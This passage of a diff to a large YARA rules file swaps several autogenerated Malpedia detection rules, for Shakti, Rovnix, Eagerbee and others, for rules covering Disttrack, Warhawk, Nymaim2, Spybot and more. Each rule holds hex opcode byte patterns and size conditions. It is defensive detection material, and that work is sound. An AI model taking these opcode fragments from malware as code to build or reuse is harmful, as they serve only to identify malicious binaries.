+		$sequence_9 = { 83c604 83c410 83c714 81fe???????? 7cdf 8bcd e8???????? }
 
 	condition:
-		7 of them and filesize < 1335296
+		7 of them and filesize < 409600
 }
-rule MALPEDIA_Win_Shakti_Auto : FILE
+rule MALPEDIA_Win_Disttrack_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "5b5fdc29-c870-550c-b3e7-47224f030c24"
+		id = "e31a7534-93aa-5c3a-8d1c-4db6a4e10208"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.shakti"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.shakti_auto.yar#L1-L166"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.disttrack"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.disttrack_auto.yar#L1-L275"
 		license_url = "N/A"
-		logic_hash = "f9488b8a8445549b2d17849193cda20ba79220110ad09656a16f1b56d9644dea"
+		logic_hash = "f3a6eab6984225695ff1eabbd0fc23dd3ab520ffce08e75f88d4a97c81e66461"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -82471,38 +82755,49 @@ rule MALPEDIA_Win_Shakti_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b45cc 0fb608 83f961 7c12 8b55cc 0fb602 }
-		$sequence_1 = { 8b45cc 83c002 50 8b4dc0 51 ff55dc }
-		$sequence_2 = { 8945e0 837de000 0f848b000000 8b4de0 8b5128 }
-		$sequence_3 = { 8b55f8 0fb74206 8b4df8 668b5106 6683ea01 }
-		$sequence_4 = { 8b45cc 0fb608 034dfc 894dfc 8b55cc }
-		$sequence_5 = { 6a00 52 e8???????? 8d442418 }
-		$sequence_6 = { 662301 0fb7d0 8b45c0 25ffff0000 0fb7c8 8b45e0 }
-		$sequence_7 = { 0fb711 8b45c4 8d0c90 894dc4 }
-		$sequence_8 = { 55 8bec 51 51 a1???????? 8945f8 8b801c090000 }
-		$sequence_9 = { 7443 8b7de4 8d45e8 50 6a40 57 ff75f4 }
-		$sequence_10 = { 7281 ff75e8 e8???????? 59 }
-		$sequence_11 = { 894810 894808 c3 56 8b742408 }
-		$sequence_12 = { a3???????? a1???????? c705????????b5434000 8935???????? }
-		$sequence_13 = { 3b04cd10a04000 7413 41 83f92d }
-		$sequence_14 = { ff15???????? 68???????? 50 ff15???????? 8bf0 85f6 7468 }
-		$sequence_15 = { 888820a64000 40 ebe9 33c0 8945e4 }
+		$sequence_0 = { e8???????? 83c404 50 e8???????? 83c404 68???????? ff15???????? }
+		$sequence_1 = { 53 ff15???????? 5d 5b 8bc7 5f 5e }
+		$sequence_2 = { ff15???????? 8d45dc 50 ff15???????? 8b4ddc }
+		$sequence_3 = { 57 e8???????? 6a07 e8???????? 59 c3 6a10 }
+		$sequence_4 = { 52 6a00 6a00 6848000700 }
+		$sequence_5 = { 83c420 53 6800010000 53 53 56 }
+		$sequence_6 = { 89410c 854110 740d 53 }
+		$sequence_7 = { 83c701 83d300 85f6 758c 8b45e0 8b55e4 83c0ff }
+		$sequence_8 = { e8???????? 488d1dae690100 488bcb e8???????? 488bcf 448bc0 4503c0 }
+		$sequence_9 = { 488bd3 33c9 e8???????? 488bd8 488d0584210100 }
+		$sequence_10 = { 498bcd e8???????? 4a8d4c5d80 498bd5 448d0400 e8???????? }
+		$sequence_11 = { 32db ff15???????? c78520ffffff202b4200 c78530ffffff702a4200 c74590cc294200 }
+		$sequence_12 = { 4c2bc6 33d2 8bc3 ffc3 f7b42498000000 428a042a 413201 }
+		$sequence_13 = { 75fc 8b0d???????? 51 e8???????? 83c404 833d????????00 }
+		$sequence_14 = { ff15???????? 32c0 488b8d70030000 4833cc e8???????? 4c8d9c2480040000 }
+		$sequence_15 = { 02c0 02d0 8a45fa 88550c 8ad0 c0ea02 }
+		$sequence_16 = { 8b75f8 2bc1 03c2 c1fb05 83e61f 8d1c9d40174200 }
+		$sequence_17 = { 8975e4 33c0 39b8d0f84100 0f8491000000 ff45e4 83c030 }
+		$sequence_18 = { c7440ae8b4c24100 8b41f8 8b5004 c7440af8???????? 8b41e8 8b5004 }
+		$sequence_19 = { 0fb755d4 0fb745e4 3bd0 750c 0fb74dd6 0fb755e6 }
+		$sequence_20 = { 64a300000000 8965e8 837d0800 741f 837d1c00 7419 }
+		$sequence_21 = { c744243400c34100 c744244408c34100 899c24a0030000 834c242c01 6a04 }
+		$sequence_22 = { 4883ec28 ff15???????? 8b15???????? 448bd8 8bc8 8bc2 412bc3 }
+		$sequence_23 = { 486bd258 490314c8 488d0d1f9b0100 eb11 488d0d169b0100 488bd1 }
+		$sequence_24 = { b856555555 f7e9 53 8bc2 56 c1e81f 8d540204 }
+		$sequence_25 = { c6400d10 488b45b0 83600800 488b45b0 }
+		$sequence_26 = { c744243c702a4200 c784249c0000007c2a4200 8d542444 52 8d442430 89bc245c060000 }
 
 	condition:
-		7 of them and filesize < 191488
+		7 of them and filesize < 1112064
 }
-rule MALPEDIA_Win_Brutpos_Auto : FILE
+rule MALPEDIA_Win_Warhawk_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "bb6abccd-59b3-5a30-9e67-ccbe498737a5"
+		id = "d92d335d-f362-53f6-93fa-a01200e00bae"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.brutpos"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.brutpos_auto.yar#L1-L117"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.warhawk"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.warhawk_auto.yar#L1-L127"
 		license_url = "N/A"
-		logic_hash = "89d0bc6a7e52ba9f63dface96ebbf483b03be0cbf8144ed32f3b88bf360b4eda"
+		logic_hash = "d9e9a0b8b1caa43bf9cbeab42b90b2f052f6c3a1e02d41041e6ffa8282518c4f"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -82516,34 +82811,34 @@ rule MALPEDIA_Win_Brutpos_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 59 58 83c004 83e904 8808 }
-		$sequence_1 = { 03c2 034508 2938 83e902 75e8 ebd9 5e }
-		$sequence_2 = { 8d5b18 8b5b60 03d8 52 8b35???????? }
-		$sequence_3 = { 6681f9df77 7412 0f31 8bd8 }
-		$sequence_4 = { 8bd0 ad 8bc8 83e908 66ad 6685c0 740c }
-		$sequence_5 = { 8d7c38fc baffffffff 83c704 57 }
-		$sequence_6 = { 66ad 6685c0 740c 25ff0f0000 03c2 034508 }
-		$sequence_7 = { 52 e8???????? 59 8b09 8bd1 }
-		$sequence_8 = { c1e202 03d3 8b12 03d0 }
-		$sequence_9 = { 8b5508 8b4204 0fb70a 50 51 807401ff97 }
+		$sequence_0 = { 0f84d4feffff 5f 8bc6 5e 5b }
+		$sequence_1 = { 803c0a20 7706 41 894e08 ebf0 3bc8 7504 }
+		$sequence_2 = { ff7510 e8???????? 8b7d08 8bf0 85ff 0f84b1000000 8b5d0c }
+		$sequence_3 = { 0f8490000000 8d45f4 0f57c0 50 0f2945e0 }
+		$sequence_4 = { 50 8d44247c 50 8d842474030000 68???????? 50 ffd6 }
+		$sequence_5 = { a3???????? eb33 8b85f8fbffff 8b04b0 0305???????? 50 68???????? }
+		$sequence_6 = { 8bf0 8b85f0f7ffff ff7010 a1???????? 68???????? 68???????? }
+		$sequence_7 = { 8974243c ebce 8b44243c 47 8974243c 8930 894604 }
+		$sequence_8 = { 7407 8b4e04 8b06 8901 8b0e }
+		$sequence_9 = { eb49 b9???????? 8bc2 8a18 3a19 885dfb bb00000000 }
 
 	condition:
-		7 of them and filesize < 65536
+		7 of them and filesize < 2345984
 }
-rule MALPEDIA_Win_Rovnix_Auto : FILE
+rule MALPEDIA_Win_Nymaim2_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "75582b32-2396-52b5-ad83-7563a2940a52"
+		id = "b34e9293-8593-5a44-9c75-a60856a38adc"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rovnix"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.rovnix_auto.yar#L1-L331"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nymaim2"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.nymaim2_auto.yar#L1-L130"
 		license_url = "N/A"
-		logic_hash = "ed6329dc4f284f83c7abc03edae1041f365607dbb53bb190660ed33f6a939524"
+		logic_hash = "1e69e778cd0db9f8366da07218fbdcf365b60086ad2357e3134734801ed5db37"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -82555,58 +82850,32 @@ rule MALPEDIA_Win_Rovnix_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { c1e902 ad 2bc3 ab e2fa }
-		$sequence_1 = { 8bf8 83c335 c1e902 ad }
-		$sequence_2 = { 6a00 ffd2 89442408 8bcf }
-		$sequence_3 = { 8b15???????? 83e7f0 89542418 83c710 }
-		$sequence_4 = { 7405 57 6a00 ffd2 }
-		$sequence_5 = { bf40090000 be???????? 8b15???????? 83e7f0 }
-		$sequence_6 = { 8d4e1c 8908 8b4508 c7461801000000 8b4804 8906 }
-		$sequence_7 = { c745cc18000000 8975d0 c745d800020000 8975d4 }
-		$sequence_8 = { c745d800020000 8975d4 8975dc 8975e0 }
-		$sequence_9 = { c1e802 25ff000000 8d4cc624 8b01 }
-		$sequence_10 = { 7703 83c220 85c0 7404 }
-		$sequence_11 = { 8975e4 c745ec40020000 8975e8 8975f0 8975f4 ff15???????? }
-		$sequence_12 = { 7306 8b00 3bc1 75f3 395e14 }
-		$sequence_13 = { 85c0 7405 8d4e1c 8908 }
-		$sequence_14 = { 8b5e14 8b7e10 eb06 8b5d0c 8b7d08 8bcf }
-		$sequence_15 = { 85c0 e8???????? 8be5 5d c3 }
-		$sequence_16 = { 23c9 16 85c9 23d2 }
-		$sequence_17 = { 23db 81e1ff000000 23c9 83440c0404 }
-		$sequence_18 = { 5d c3 85c0 e8???????? }
-		$sequence_19 = { 5d c3 85c9 e8???????? }
-		$sequence_20 = { 55 8bec 85db 85c9 }
-		$sequence_21 = { 2d02ca3b45 05bd6f0e7b 2d3f459239 5a }
-		$sequence_22 = { 488b8c24d0000000 c744244818000000 488d442470 4889442440 896c2438 488d442460 48896c2430 }
-		$sequence_23 = { 747b 488d0543fcffff 488d0d18630000 33d2 48894310 48894320 48894328 }
-		$sequence_24 = { d6 b772 9af6b95c8decc4 7c8f d6 b772 9af6b95c8decc4 }
-		$sequence_25 = { 3425 33ce 3d6aa7d294 61 89fa 94 61 }
-		$sequence_26 = { e018 0fb61cc0 50 68???????? 6a04 57 }
-		$sequence_27 = { 8bda 4803d8 83e3e0 c1ea05 448bc1 3bd1 0f8683000000 }
-		$sequence_28 = { 4c3b02 750e 448a410b 443a4208 7504 8bc6 eb05 }
-		$sequence_29 = { 85db 8b4d08 85db 85c9 81e1ff000000 }
-		$sequence_30 = { 4b 46 92 c55151 a2???????? d24b46 }
-		$sequence_31 = { 6e 17 48 2b6e17 48 8ee2 }
-		$sequence_32 = { 488d542430 488d4c2440 e8???????? 41b910000000 488d542450 458d41f1 488d4c2478 }
-		$sequence_33 = { ff15???????? 48295c2428 6601742420 6601742422 bb01000000 eb0a bf9a0000c0 }
-		$sequence_34 = { 1f d337 a6 ff08 f26d 17 }
-		$sequence_35 = { 488b03 488905???????? 488b4308 488905???????? 8b4310 8905???????? 488b4b20 }
+		$sequence_0 = { 8065fc00 8d4dd8 e8???????? 834dfcff 8d4d08 e8???????? 8b4df4 }
+		$sequence_1 = { 3b01 751e 53 50 8d450c 56 50 }
+		$sequence_2 = { 8bcc 896508 50 ff75e4 eb20 a1???????? }
+		$sequence_3 = { 7e64 8b45b8 8d4dec 8d04b0 50 e8???????? 8d4dec }
+		$sequence_4 = { 57 8bf1 8365fc00 8b7e08 51 8d4508 8bcc }
+		$sequence_5 = { 56 50 c645fc03 ff7508 ff75ec e8???????? 83c410 }
+		$sequence_6 = { 33db 59 53 8d4ddc e8???????? 8d8d30ffffff 895dfc }
+		$sequence_7 = { 03450c c1ea0c 0301 83ea00 }
+		$sequence_8 = { 837dd80c 74e7 3ac3 0f843f030000 837dd802 7509 395dd0 }
+		$sequence_9 = { c645fc02 e8???????? 8b00 8bcf 8945e8 8d45e4 50 }
 
 	condition:
-		7 of them and filesize < 548864
+		7 of them and filesize < 753664
 }
-rule MALPEDIA_Win_Eagerbee_Auto : FILE
+rule MALPEDIA_Win_Homefry_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "2914e030-5e45-5c35-a3c7-d9acb5cc0ce1"
+		id = "7df805f2-9572-5d41-ae6a-f57f653d9d31"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.eagerbee"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.eagerbee_auto.yar#L1-L125"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.homefry"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.homefry_auto.yar#L1-L120"
 		license_url = "N/A"
-		logic_hash = "3bba3fefff572c4fd61435a0b0fa92dfc257235bdf724d5d11ca53b01740914f"
+		logic_hash = "7ca7431c5f68652158a7da10d411e05a72b05761bc09d487931a01e83f98c509"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -82620,71 +82889,71 @@ rule MALPEDIA_Win_Eagerbee_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 488b5510 488b4b38 4c8bc7 482bd7 e8???????? }
-		$sequence_1 = { 498b4310 410fb7c8 66f7d1 66c1e908 880c02 41ff4328 458b4b28 }
-		$sequence_2 = { 498980b0010000 c68424a000000057 c68424a100000053 c68424a200000041 c68424a300000053 c68424a400000074 c68424a500000061 }
-		$sequence_3 = { 488364242000 b8fffe0000 4c8d4c2444 488d542440 41b802000000 488bcb 6689442440 }
-		$sequence_4 = { c787cc00000001000000 c787c800000001000000 e8???????? 488b05???????? }
-		$sequence_5 = { ff15???????? 85c0 750e 035c2448 4863f3 4803f7 c646ff5f }
-		$sequence_6 = { 8bc3 eb3b 4d85e4 7408 498bcc }
-		$sequence_7 = { 483bc3 750d ff15???????? 33c0 e9???????? 48895c2430 488d8424c0100000 }
-		$sequence_8 = { c787ac00000006000000 498d0443 89b7b0000000 c6473c08 488987f8160000 498d044b }
-		$sequence_9 = { 8b8c3888000000 41b801000000 488bd7 e8???????? 8bf0 837c3e1800 }
+		$sequence_0 = { e8???????? 4863d5 4803d0 488b05???????? 488917 48630a }
+		$sequence_1 = { 740f 8bcf 4803cd 7408 488bd6 }
+		$sequence_2 = { 740f 8bcf 4803cd 7408 }
+		$sequence_3 = { 0f880a010000 488b0d???????? 488d842480000000 458d4e04 488b09 4c8d442470 }
+		$sequence_4 = { c705????????94000000 ff15???????? 33d2 8d4a02 ff15???????? 488bd8 }
+		$sequence_5 = { e8???????? 84c0 0f8418010000 48833d????????00 48899c24a0000000 4889b424a8000000 7471 }
+		$sequence_6 = { ff15???????? 488bcb ff15???????? 4881c420040000 }
+		$sequence_7 = { 486305???????? 4c890d???????? 48630c18 4c03c3 40883a }
+		$sequence_8 = { e8???????? eb05 e8???????? 84c0 7511 488d0ddd180000 }
+		$sequence_9 = { 483bdd 72d0 488bcf ff15???????? 33c0 488b5c2430 488b6c2438 }
 
 	condition:
-		7 of them and filesize < 422912
+		7 of them and filesize < 65536
 }
-rule MALPEDIA_Win_Tabmsgsql_Auto : FILE
+rule MALPEDIA_Win_Unidentified_082_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "46efd2fa-703e-5a59-aba6-3e76ded2c28a"
-		date = "2024-10-31"
-		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.tabmsgsql"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.tabmsgsql_auto.yar#L1-L125"
+		id = "7772581c-e8cf-5615-a758-46ef9c1fc0b0"
+		date = "2021-10-07"
+		modified = "2021-10-08"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_082"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.unidentified_082_auto.yar#L1-L124"
 		license_url = "N/A"
-		logic_hash = "b7af53703ea2c2d22f99bfde61f6f08676ed98de77314180af9bbcb3621e1f8d"
+		logic_hash = "fdfe1ddce9f77ac8b465b0ddebe868c5e77078cf2b2457573a5b3810682f45ee"
 		score = 75
 		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
 		signator_config = "callsandjumps;datarefs;binvalue"
-		malpedia_rule_date = "20241030"
-		malpedia_hash = "26e26953c49c8efafbf72a38076855d578e0a2e4"
-		malpedia_version = "20241030"
+		malpedia_rule_date = "20211007"
+		malpedia_hash = "e5b790e0f888f252d49063a1251ca60ec2832535"
+		malpedia_version = "20211008"
 		malpedia_license = "CC BY-SA 4.0"
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { a1???????? 85c0 74e1 a1???????? 85c0 741a a1???????? }
-		$sequence_1 = { c3 8d560a 52 68???????? }
-		$sequence_2 = { 50 57 6a01 56 ff15???????? 8b442444 8b4c2448 }
-		$sequence_3 = { 8b6c2418 56 57 8b7c2418 33db 57 50 }
-		$sequence_4 = { 57 6a01 56 ff15???????? 8b442444 8b4c2448 03c7 }
-		$sequence_5 = { 25ffff0000 50 8b44242a 51 }
-		$sequence_6 = { 8b4508 53 6a01 50 b9???????? e8???????? }
-		$sequence_7 = { 8965f0 66ab 53 53 aa 8a4510 51 }
-		$sequence_8 = { 7d04 0430 eb02 0437 8801 }
-		$sequence_9 = { 5e 5d 5b 7421 8b8424f8f40100 8d4c2400 50 }
+		$sequence_0 = { 4c8d0dbc190200 0f1f4000 0f1f840000000000 418d4801 }
+		$sequence_1 = { ff5018 4c634510 488d0df40a0200 488bd8 33c0 }
+		$sequence_2 = { 4c634510 488d0d93fa0100 488bd8 33c0 488bd3 488905???????? 488905???????? }
+		$sequence_3 = { ff15???????? 488b0cdf ff15???????? 48c704dfffffffff }
+		$sequence_4 = { 4885c0 0f84ac010000 48833d????????00 0f849e010000 48833d????????00 0f8490010000 48833d????????00 }
+		$sequence_5 = { 488b0d???????? 8b5108 488b4910 4533c9 458d4130 4c89742420 }
+		$sequence_6 = { 33c0 e9???????? 8a07 4c8b7c2448 4c8d25a64c0100 4b8b0cfc ffc3 }
+		$sequence_7 = { 0f1f4000 0f1f840000000000 418d4801 0fb6c2 41ffc0 f7da }
+		$sequence_8 = { 488b4f18 4c8d4d10 488b01 488d1587000200 41b810000000 ff5018 4c634510 }
+		$sequence_9 = { 48894598 eb03 4533f6 488b05???????? 80782e00 740a 80782000 }
 
 	condition:
-		7 of them and filesize < 163840
+		7 of them and filesize < 414720
 }
-rule MALPEDIA_Win_Whitebird_Auto : FILE
+rule MALPEDIA_Win_Spybot_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "e4f95047-ddcd-5a63-a3ce-8b63fa9928fc"
+		id = "a4cba476-a2c7-50aa-a7bf-4af17da5b6df"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.whitebird"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.whitebird_auto.yar#L1-L162"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.spybot"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.spybot_auto.yar#L1-L130"
 		license_url = "N/A"
-		logic_hash = "f6f1864635810fc12da43aba0178bc81fe845d55a2fe60f4512e4d032da48db4"
+		logic_hash = "d537b785313261fc15df85466bf871fb981ce27e93c3d7cf670a5bb54b105b2b"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -82698,37 +82967,32 @@ rule MALPEDIA_Win_Whitebird_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { eb09 80f92f 0f95c1 80c13f }
-		$sequence_1 = { 33c0 e9???????? 4883c9ff 33c0 488dbc2470020000 66f2af }
-		$sequence_2 = { 8bcb e8???????? 8bcb e8???????? 85c0 7426 }
-		$sequence_3 = { 458d4102 e8???????? e9???????? e8???????? cc }
-		$sequence_4 = { d1f8 83f801 0f82e7010000 33c0 884df4 }
-		$sequence_5 = { 8d45c0 50 ffb598fcffff c78594fcffff01000000 899d90fcffff ffd6 85c0 }
-		$sequence_6 = { 83fa20 75c6 41803841 7cc0 4180385a 7fba }
-		$sequence_7 = { 7e34 eb05 b9409c0000 8bc3 2bc6 3bc1 7e02 }
-		$sequence_8 = { e8???????? 488d0d4e4f0000 ff15???????? 85c0 7473 488d0d3d4d0000 }
-		$sequence_9 = { 53 53 6a0b 68???????? }
-		$sequence_10 = { 48f7d1 6689844c70020000 488d542420 488bcd ff15???????? 33c9 3bc1 }
-		$sequence_11 = { 488bd9 33c0 488d4c2432 33d2 41b8fe030000 }
-		$sequence_12 = { 8ac1 b307 f6eb 30040e }
-		$sequence_13 = { ff15???????? 48832300 4883c308 4883ef01 }
-		$sequence_14 = { 888c05e8fdffff 40 33f6 85c9 761e 8dbc05e8fdffff 81feff000000 }
+		$sequence_0 = { 59 50 57 e8???????? 59 50 ff7518 }
+		$sequence_1 = { 3bc7 7309 83ffff 0f8599080000 53 e8???????? 59 }
+		$sequence_2 = { f7f1 8bd8 ff15???????? ff75e4 e8???????? 3975c8 }
+		$sequence_3 = { 83c624 3b7dfc 0f8c66ffffff 395df8 0f8512ffffff ff75f4 }
+		$sequence_4 = { 0f85a6000000 80fb41 0f849d000000 0fbef3 56 68???????? 8d45ec }
+		$sequence_5 = { ff15???????? ff75d2 ff15???????? 8945fc 8d8520feffff 50 897508 }
+		$sequence_6 = { 50 e8???????? 83c410 399d54ffffff 0f85a8faffff 53 }
+		$sequence_7 = { 7d1f 3c5d 741b 397dfc 7516 8b5d0c }
+		$sequence_8 = { ffb43578ffffff 8d85f8f8ffff 68???????? 50 e8???????? ffb4357cffffff e8???????? }
+		$sequence_9 = { ff742414 56 ff742418 ff742418 e8???????? 83c414 56 }
 
 	condition:
-		7 of them and filesize < 139264
+		7 of them and filesize < 2367488
 }
-rule MALPEDIA_Win_Plurox_Auto : FILE
+rule MALPEDIA_Win_Khrat_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "00819bcc-51e2-53a8-9308-9b7887ed6069"
+		id = "6db105ed-fa5f-5732-ac42-40d20165099d"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.plurox"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.plurox_auto.yar#L1-L112"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.khrat"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.khrat_auto.yar#L1-L119"
 		license_url = "N/A"
-		logic_hash = "fa579257df25509063a4df447932e0b25e6ea4c45a2af23b4dfc95998427a19a"
+		logic_hash = "d3a598db6b81f9cdf5c2df41f102b4f7efaa91eac99a2097cd83dc35f1bc7100"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -82742,32 +83006,32 @@ rule MALPEDIA_Win_Plurox_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 0416 128bc606091a f6870f1a000000 e10d 21c9 8918 }
-		$sequence_1 = { 0a20 0816 ec bbf2000000 }
-		$sequence_2 = { 300f 353e0fee3c 031e 2200 }
-		$sequence_3 = { 624a8b 0416 128bc606091a f6870f1a000000 e10d 21c9 }
-		$sequence_4 = { 94 f8 21480e 2a15???????? 6f }
-		$sequence_5 = { 6808486409 58 0000 00e4 0487 58 }
-		$sequence_6 = { 0925???????? 0000 c48dcd713240 89f5 }
-		$sequence_7 = { 0416 128bc606091a f6870f1a000000 e10d }
-		$sequence_8 = { 0442 6808486409 58 0000 }
-		$sequence_9 = { 0d04b8ca08 6af3 dac9 0000 00ee }
+		$sequence_0 = { a3???????? 6a30 8d45d0 50 }
+		$sequence_1 = { 8d1d10520010 8b4d08 6bc914 8d1c19 833b00 }
+		$sequence_2 = { 7517 8b4307 0fb74b02 83e90b 8d730b 51 56 }
+		$sequence_3 = { 807b0500 757e 807b0600 7518 }
+		$sequence_4 = { 56 57 e8???????? 50 e8???????? 40 d1e0 }
+		$sequence_5 = { 8d85f8fcffff 50 8d85fcfdffff 50 6801000080 }
+		$sequence_6 = { 66c7464c0000 8db500fdffff 66c7067b00 66c746024600 66c746043800 66c746063800 66c746083500 }
+		$sequence_7 = { ffb5bcfbffff 6a00 e8???????? c60300 c64301c4 }
+		$sequence_8 = { 53 51 56 57 c785ecfdffff00000000 }
+		$sequence_9 = { 56 50 e8???????? eb0f 807b06ff 7509 }
 
 	condition:
-		7 of them and filesize < 475136
+		7 of them and filesize < 57344
 }
-rule MALPEDIA_Win_Unidentified_103_Auto : FILE
+rule MALPEDIA_Win_Unidentified_077_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "887a2a34-16c4-5940-84aa-60b8d12f0d1d"
+		id = "c7f9be79-20b6-5aa4-9bbd-94e7c4c6bef7"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_103"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.unidentified_103_auto.yar#L1-L128"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_077"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.unidentified_077_auto.yar#L1-L119"
 		license_url = "N/A"
-		logic_hash = "e05c648365bd2898e5f79fec6ee4b7da15c9961641307154c17359b01f91ade3"
+		logic_hash = "90028d042242a66c9237db24c75f8aa2228010ebd44b2069db8290680e688e20"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -82781,32 +83045,32 @@ rule MALPEDIA_Win_Unidentified_103_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 896c2408 89442440 8b842434010000 895c2410 8944243c 8b842490000000 89442438 }
-		$sequence_1 = { 8b842490000000 ffd0 897c2408 890424 8b8424a8000000 c744240400000000 ffd0 }
-		$sequence_2 = { 57 56 53 83ec5c 8b5c2474 8bac2488000000 8bb4248c000000 }
-		$sequence_3 = { 890424 8b842414010000 ffd0 83ec10 }
-		$sequence_4 = { ffd0 83ec0c 85c0 7417 890424 8b8424f0000000 c744240400000000 }
-		$sequence_5 = { ffd5 c744240400000000 890424 89742408 ffd7 83ec0c 85db }
-		$sequence_6 = { 885c242c 8b4c2434 01ea 0fb61c01 885c0204 83c001 83f808 }
-		$sequence_7 = { 890424 8b8424f0000000 ffd0 83ec08 8b8424b4000000 }
-		$sequence_8 = { 8d7240 8944245c 8dbc248c000000 89442404 897c2408 893424 }
-		$sequence_9 = { 31c0 803a00 7415 90 8d742600 83c001 803c0200 }
+		$sequence_0 = { 410fb74716 c1e80d 83e001 48896e58 894620 488d058dfcffff 48894628 }
+		$sequence_1 = { ba30750000 c744242030750000 448bca 448bc2 488bcf ff15???????? }
+		$sequence_2 = { 48895c2458 ff15???????? 488bf8 4885c0 750e ff15???????? }
+		$sequence_3 = { 2bcb 3bc8 7653 8bd1 }
+		$sequence_4 = { 4883ec38 33c0 4c8d05b3feffff 4889442428 4533c9 }
+		$sequence_5 = { ff15???????? 488bce 418907 ff15???????? }
+		$sequence_6 = { 83e03f 2bc8 48d3cf 4933fa 4b87bcf7e0c70100 33c0 }
+		$sequence_7 = { 83e001 48896e58 894620 488d058dfcffff 48894628 488d0592fcffff }
+		$sequence_8 = { e9???????? 493bec 0f84be000000 8b7500 33c0 f04d0fb1bcf180bf0100 }
